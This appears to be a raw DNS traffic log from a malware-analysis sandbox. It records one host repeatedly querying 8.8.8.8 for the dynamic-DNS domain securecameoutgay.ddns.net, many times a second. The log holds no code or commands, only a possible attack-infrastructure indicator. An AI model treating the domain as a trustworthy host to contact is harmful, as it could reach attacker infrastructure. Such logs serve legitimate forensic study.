                                                    Oct 12, 2024 23:05:30.124191046 CEST192.168.2.148.8.8.80x3941Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.130975008 CEST192.168.2.148.8.8.80x3941Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.137677908 CEST192.168.2.148.8.8.80x90cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.144488096 CEST192.168.2.148.8.8.80x90cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.151298046 CEST192.168.2.148.8.8.80x90cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.157757044 CEST192.168.2.148.8.8.80x90cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.164200068 CEST192.168.2.148.8.8.80x90cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.170959949 CEST192.168.2.148.8.8.80x9156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.177483082 CEST192.168.2.148.8.8.80x9156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.184293032 CEST192.168.2.148.8.8.80x9156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.191286087 CEST192.168.2.148.8.8.80x9156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.198071003 CEST192.168.2.148.8.8.80x9156Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.204783916 CEST192.168.2.148.8.8.80x1feaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.211402893 CEST192.168.2.148.8.8.80x1feaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.218074083 CEST192.168.2.148.8.8.80x1feaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.224832058 CEST192.168.2.148.8.8.80x1feaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.231437922 CEST192.168.2.148.8.8.80x1feaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.238648891 CEST192.168.2.148.8.8.80xb121Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.245491028 CEST192.168.2.148.8.8.80xb121Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.251930952 CEST192.168.2.148.8.8.80xb121Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.258224010 CEST192.168.2.148.8.8.80xb121Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.264602900 CEST192.168.2.148.8.8.80xb121Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.271612883 CEST192.168.2.148.8.8.80x85bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.278228998 CEST192.168.2.148.8.8.80x85bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.284832001 CEST192.168.2.148.8.8.80x85bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.291520119 CEST192.168.2.148.8.8.80x85bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.298077106 CEST192.168.2.148.8.8.80x85bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.304874897 CEST192.168.2.148.8.8.80x8511Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.311765909 CEST192.168.2.148.8.8.80x8511Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.318747997 CEST192.168.2.148.8.8.80x8511Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.325392962 CEST192.168.2.148.8.8.80x8511Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.335736990 CEST192.168.2.148.8.8.80x8511Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.342420101 CEST192.168.2.148.8.8.80x57c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.349241018 CEST192.168.2.148.8.8.80x57c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.356488943 CEST192.168.2.148.8.8.80x57c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.363413095 CEST192.168.2.148.8.8.80x57c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.372564077 CEST192.168.2.148.8.8.80x57c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.379204988 CEST192.168.2.148.8.8.80xec4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.385762930 CEST192.168.2.148.8.8.80xec4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.392601967 CEST192.168.2.148.8.8.80xec4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.399482965 CEST192.168.2.148.8.8.80xec4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.405961990 CEST192.168.2.148.8.8.80xec4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.412616014 CEST192.168.2.148.8.8.80xa4b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.419188023 CEST192.168.2.148.8.8.80xa4b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.426115036 CEST192.168.2.148.8.8.80xa4b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.432715893 CEST192.168.2.148.8.8.80xa4b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.439513922 CEST192.168.2.148.8.8.80xa4b5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.446139097 CEST192.168.2.148.8.8.80x420eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.452970028 CEST192.168.2.148.8.8.80x420eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.459688902 CEST192.168.2.148.8.8.80x420eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.466526985 CEST192.168.2.148.8.8.80x420eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.473174095 CEST192.168.2.148.8.8.80x420eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.479717970 CEST192.168.2.148.8.8.80xd029Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.486604929 CEST192.168.2.148.8.8.80xd029Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.493439913 CEST192.168.2.148.8.8.80xd029Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.500161886 CEST192.168.2.148.8.8.80xd029Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.507631063 CEST192.168.2.148.8.8.80xd029Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.514188051 CEST192.168.2.148.8.8.80x2040Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.520839930 CEST192.168.2.148.8.8.80x2040Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.527445078 CEST192.168.2.148.8.8.80x2040Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.534135103 CEST192.168.2.148.8.8.80x2040Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.796330929 CEST192.168.2.148.8.8.80x2040Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.805480003 CEST192.168.2.148.8.8.80x1b1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.812172890 CEST192.168.2.148.8.8.80x1b1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.818722963 CEST192.168.2.148.8.8.80x1b1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.825669050 CEST192.168.2.148.8.8.80x1b1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.832175016 CEST192.168.2.148.8.8.80x1b1aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.838551044 CEST192.168.2.148.8.8.80x7da4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.845151901 CEST192.168.2.148.8.8.80x7da4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.851696968 CEST192.168.2.148.8.8.80x7da4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.858218908 CEST192.168.2.148.8.8.80x7da4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.864655972 CEST192.168.2.148.8.8.80x7da4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.871400118 CEST192.168.2.148.8.8.80xfefaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.877754927 CEST192.168.2.148.8.8.80xfefaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.884577036 CEST192.168.2.148.8.8.80xfefaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.890935898 CEST192.168.2.148.8.8.80xfefaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.897353888 CEST192.168.2.148.8.8.80xfefaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.904087067 CEST192.168.2.148.8.8.80x6cbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.911060095 CEST192.168.2.148.8.8.80x6cbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.917860985 CEST192.168.2.148.8.8.80x6cbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.924331903 CEST192.168.2.148.8.8.80x6cbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.930802107 CEST192.168.2.148.8.8.80x6cbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.937680960 CEST192.168.2.148.8.8.80x1f26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.944252014 CEST192.168.2.148.8.8.80x1f26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.951081038 CEST192.168.2.148.8.8.80x1f26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.957433939 CEST192.168.2.148.8.8.80x1f26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.963970900 CEST192.168.2.148.8.8.80x1f26Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.970448971 CEST192.168.2.148.8.8.80x8a8aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.976929903 CEST192.168.2.148.8.8.80x8a8aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.983448029 CEST192.168.2.148.8.8.80x8a8aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.990227938 CEST192.168.2.148.8.8.80x8a8aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.996926069 CEST192.168.2.148.8.8.80x8a8aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.004427910 CEST192.168.2.148.8.8.80xbc61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.011337042 CEST192.168.2.148.8.8.80xbc61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.018053055 CEST192.168.2.148.8.8.80xbc61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.024599075 CEST192.168.2.148.8.8.80xbc61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.031433105 CEST192.168.2.148.8.8.80xbc61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.037934065 CEST192.168.2.148.8.8.80x616aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.044625044 CEST192.168.2.148.8.8.80x616aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.051600933 CEST192.168.2.148.8.8.80x616aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.057945013 CEST192.168.2.148.8.8.80x616aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.064954042 CEST192.168.2.148.8.8.80x616aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.071501017 CEST192.168.2.148.8.8.80x2439Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.078419924 CEST192.168.2.148.8.8.80x2439Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.084908009 CEST192.168.2.148.8.8.80x2439Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.091732979 CEST192.168.2.148.8.8.80x2439Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.098387957 CEST192.168.2.148.8.8.80x2439Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.105395079 CEST192.168.2.148.8.8.80x4921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.112040997 CEST192.168.2.148.8.8.80x4921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.118880033 CEST192.168.2.148.8.8.80x4921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.125768900 CEST192.168.2.148.8.8.80x4921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.133662939 CEST192.168.2.148.8.8.80x4921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.141017914 CEST192.168.2.148.8.8.80x6194Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.147546053 CEST192.168.2.148.8.8.80x6194Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.154059887 CEST192.168.2.148.8.8.80x6194Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.160674095 CEST192.168.2.148.8.8.80x6194Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.167365074 CEST192.168.2.148.8.8.80x6194Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.174245119 CEST192.168.2.148.8.8.80xb1b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.180963993 CEST192.168.2.148.8.8.80xb1b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.187638998 CEST192.168.2.148.8.8.80xb1b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.194099903 CEST192.168.2.148.8.8.80xb1b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.200582981 CEST192.168.2.148.8.8.80xb1b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.207470894 CEST192.168.2.148.8.8.80x4aafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.214715004 CEST192.168.2.148.8.8.80x4aafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.221666098 CEST192.168.2.148.8.8.80x4aafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.228712082 CEST192.168.2.148.8.8.80x4aafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.235410929 CEST192.168.2.148.8.8.80x4aafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.242197990 CEST192.168.2.148.8.8.80x73daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.249162912 CEST192.168.2.148.8.8.80x73daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.256268978 CEST192.168.2.148.8.8.80x73daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.263083935 CEST192.168.2.148.8.8.80x73daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.270051956 CEST192.168.2.148.8.8.80x73daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.276870012 CEST192.168.2.148.8.8.80x8152Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.283255100 CEST192.168.2.148.8.8.80x8152Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.289791107 CEST192.168.2.148.8.8.80x8152Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.296211004 CEST192.168.2.148.8.8.80x8152Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.303143978 CEST192.168.2.148.8.8.80x8152Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.310306072 CEST192.168.2.148.8.8.80xc8bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.316781998 CEST192.168.2.148.8.8.80xc8bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.323333025 CEST192.168.2.148.8.8.80xc8bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.330163002 CEST192.168.2.148.8.8.80xc8bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.336591005 CEST192.168.2.148.8.8.80xc8bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.343075037 CEST192.168.2.148.8.8.80x4109Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.349435091 CEST192.168.2.148.8.8.80x4109Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.356221914 CEST192.168.2.148.8.8.80x4109Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.363012075 CEST192.168.2.148.8.8.80x4109Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.369693995 CEST192.168.2.148.8.8.80x4109Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.376321077 CEST192.168.2.148.8.8.80xc11bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.383030891 CEST192.168.2.148.8.8.80xc11bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.389975071 CEST192.168.2.148.8.8.80xc11bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.396416903 CEST192.168.2.148.8.8.80xc11bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.402761936 CEST192.168.2.148.8.8.80xc11bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.409934998 CEST192.168.2.148.8.8.80x8478Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.417027950 CEST192.168.2.148.8.8.80x8478Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.423770905 CEST192.168.2.148.8.8.80x8478Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.430551052 CEST192.168.2.148.8.8.80x8478Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.437544107 CEST192.168.2.148.8.8.80x8478Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.444457054 CEST192.168.2.148.8.8.80x2d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.452333927 CEST192.168.2.148.8.8.80x2d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.459065914 CEST192.168.2.148.8.8.80x2d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.465795040 CEST192.168.2.148.8.8.80x2d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.472512007 CEST192.168.2.148.8.8.80x2d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.479295015 CEST192.168.2.148.8.8.80x4adeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.486645937 CEST192.168.2.148.8.8.80x4adeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.493289948 CEST192.168.2.148.8.8.80x4adeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.499763966 CEST192.168.2.148.8.8.80x4adeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.506364107 CEST192.168.2.148.8.8.80x4adeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.512917042 CEST192.168.2.148.8.8.80xf911Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.519433022 CEST192.168.2.148.8.8.80xf911Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.526180983 CEST192.168.2.148.8.8.80xf911Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.532744884 CEST192.168.2.148.8.8.80xf911Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.539650917 CEST192.168.2.148.8.8.80xf911Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.546236992 CEST192.168.2.148.8.8.80x7fdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.552728891 CEST192.168.2.148.8.8.80x7fdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.559865952 CEST192.168.2.148.8.8.80x7fdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.567235947 CEST192.168.2.148.8.8.80x7fdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.575844049 CEST192.168.2.148.8.8.80x7fdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.582367897 CEST192.168.2.148.8.8.80xf776Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.589065075 CEST192.168.2.148.8.8.80xf776Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.595681906 CEST192.168.2.148.8.8.80xf776Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.603321075 CEST192.168.2.148.8.8.80xf776Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.609863043 CEST192.168.2.148.8.8.80xf776Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.616352081 CEST192.168.2.148.8.8.80xceafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.623055935 CEST192.168.2.148.8.8.80xceafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.629558086 CEST192.168.2.148.8.8.80xceafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.636447906 CEST192.168.2.148.8.8.80xceafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.643934965 CEST192.168.2.148.8.8.80xceafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:31.651401997 CEST192.168.2.148.8.8.80x9eeeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
